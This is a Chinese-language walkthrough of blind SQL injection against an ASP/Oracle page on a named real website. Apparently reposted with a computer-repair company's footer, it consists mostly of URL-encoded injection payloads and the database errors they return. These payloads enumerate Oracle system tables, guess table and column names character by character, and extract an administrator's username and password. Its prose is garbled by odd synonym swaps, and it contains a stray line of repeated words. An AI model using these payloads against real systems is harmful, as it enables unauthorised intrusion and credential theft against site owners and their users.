一次对ASP+ORACLE的注入手记
http://et.kpworld.com/star.asp?performer=马三立;
------------------------------------------------------
OraOLEDB 错误
'80040e14' ORA-00911:
invalid character
/star.asp,行83
阐明过滤了分号。
http://et.kpworld.com/star.asp?performer=马三立'
----------------------------------------------------
OraOLEDB 错误
'80004005' ORA-01756:
括号内的字符串没有正确竣事
/star.asp,行83
看来存在未过滤单引号题目。
http://et.kpworld.com/star.asp?performer=马三立' and '1'='1
----------------------------------------------------------------
闭和他单引号,正常返回。
and 0(select count(*) from admin) and '1'='1
-----------------------------------------------------------------
OraOLEDB 错误 '80040e37' ORA-00942:
table or view does not exist
/star.asp,行83
阐明不存在ADMIN这个表.
民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主**
下面需要晓得ORACLE的体系表:
确定表中行的总数:
select num_rows from user_tables where table_name='表名
----------------------存放以后用户所有表
where table_name='表名
'selectcolumn_name,
from user_tab_columns -----------------------存放所有列
where table_name='表名'
and 0(select count(*) from all_tables) and '1'='1
---------------------------------------------------------------------
存在!
all_tables是一个体系表,用来存放以后ID和其他用户的所有表
and 0(select count(*) from user_tables) and '1'='1
---------------------------------------------------------------------
返回。有这个体系表,这个表存放以后用户的所有表
and 0(select top 1 table_name from user_tables) and '1'='1
---------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00923:
FROM keyword not found where expected
/star.asp,行83
不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。
(颠末PINKEYES测试曾经确定的确不支持TOP 1)
and 0(select count(*) from user_tables where table_nam'')
and '1'='1
--------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00904:
invalid column name /star.asp,行83
当语法错误时,会表现有效列名字
and 0(select count(*) from user_tables where
table_name'''') and '1'='1
--------------------------------------------------------------------------------------------
语法正确时,成功返回标志,看来四个单引号表现空.接上去是对一些函数的测试:
and 0(select count(*) from user_tables where
sum(table_name)>1) and '1'='1
------------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934:
group function is not allowed here
/star.asp,行83
组函数不允许在这里。
and 0(select count(*) from user_tables where avg(table_name)) and
'1'='1
-------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934:
group function is not allowed here
/star.asp,行83
组函数不允许在这里。
and 0(select to_char(table_name) from user_tables) and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80004005' ORA-01427:
single-row subquery returns more
than one row
/star.asp,行83
单行的子查询返回多于一行
and 0(select count(*) from user_tables where table_name+1)
and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00920:
invalid relational operator
/star.asp,行83
测试到这里,下面看看怎么弄出他的表来:
and 0(select count(*) from performer) and%20'1'='1
-----------------------------------------------------
成功返回。这里的表是看后面URL猜的.
and 0(select count(*) from user_tables where
table_name='performer') and%20'1'='1
-------------------------------------------------------------------------------------
没返回。失败标志。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER')
and%20'1'='1
------------------------------------------------------------------------------------------------
成功了! 看来这个user_tables表只了解大写字母!
and 0(select count(*) from user_tables where
length(table_name)>10) and%20'1'='1
------------------------------------------------------------------------------------
用length函数确定最长表的位数
and 0(select count(*) from user_tables where
length(table_name)=18) and%20'1'='1
-------------------------------------------------------------------------------------
省略多少步骤,末了确定最长表为18位。
and 0(select count(*) from user_tables where
substr(table_name,1,1)='A') and%20'1'='1
-----------------------------------------------------------------------------------------
第一位为'A',
and 0(select count(*) from user_tables where
substr(table_name,1,2)='AD') and%20'1'='1
-----------------------------------------------------------------------------------------
第二位为'AD'
and 0(select count(*) from user_tables where
substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1
---------------------------------------------------------------------------------------------
省略多少,18位的表名为'ADMINAUTHORIZATION'。
and 1=(select count(*) from user_tables where
table_name='ADMINAUTHORIZATION') and%20'1'='1
--------------------------------------------------------------------------------------------
返回。
and 0(select count(*) from user_tables where
length(table_name)=2) and%20'1'='1
----------------------------------------------------------------------------------
最小表名长度为2
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1
-------------------------------------------------------------------------------------------------
没返回。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25')
and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
都成功返回。看来可以利用LIKE猜。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8)
and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
利用LIKE和LENGTH组合猜,顿时就能确定长度。
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜出第四位是S。接上去便是反复劳动了。
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜出来了。'BBSSUBJECT'
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
没返回,不象是生存用户和密码的表。再来。。。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
确定长度为15。
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)='U'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)='S'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)='USER'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)='UNSUBSCRIBEUSER')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name='UNSUBSCRIBEUSER')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
确定表名'UNSUBSCRIBEUSER',接上去猜能否有密码字段。。。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25PASS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
LIKE PASS,没返回,忧郁,连续。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25PASS%25'%20and%20length(table_name)=13)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
返回。不正确。
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)='SS')
and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)='SS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS')
and%20'1'='1
-------------------------------------------------------------------------------------------------
这里用SUBSTR减少范围.
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS'%20and%20length(column_name)=11)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
含有PASS字段的字段长度11位。根据下面的从4位开始数4位是PASS 那么PASS前是3位,后是4位,一共是11位。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)='PASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜一下,公然是。。。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)='STRPASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
全返回,确定密码字段名字'STRPASSWORD'。把密码字段抓到就好办了,再利用他抓表名:
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)
and '1'='1
-------------------------------------------------------------------------------------------------
返回,和下面猜出的表名长度符合。用SUBSTR猜出他名字:
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20substr(table_name,1,13)='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20table_name='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
全返回,确定表名为:'ADMINISTRATOR'.
and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
猜出内外有8个字段。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25ID%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%203=(select%20count(*)%20from%20ADMINISTRATOR) and '1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,2)='ID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-2,2)='ID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
可以果断是ID末端了,长度为5。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-5,5)='LNGID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name='LNGID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
出来了,LNGID。
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
最小ID,最大ID也出来,接上去弄密码:
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
LNGID为8的密码长度为4
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第一位
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第二位
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第三位
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第四位
STRPASSWORD:test
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
OH,YEAH~~密码出来了。
接着搞用户名:
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25NAME%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,4)='NAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-4,4)='NAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,1,7)='STRNAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
出来了,字段:STRNAME
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20not%20in('STRNAME','STRPASSWORD','LNGID'))%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
STRNAME值长度为4,不会是和密码相同吧。。。
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20STRNAME='test')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
呵呵,公然。
表名ADMINISTRATOR,列名:STRNAME,STRPASSWORD,LNGID
LNGID=8 STRNAME=test STRPASSWORD=test
测试完成!剩下的只是工夫题目了。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
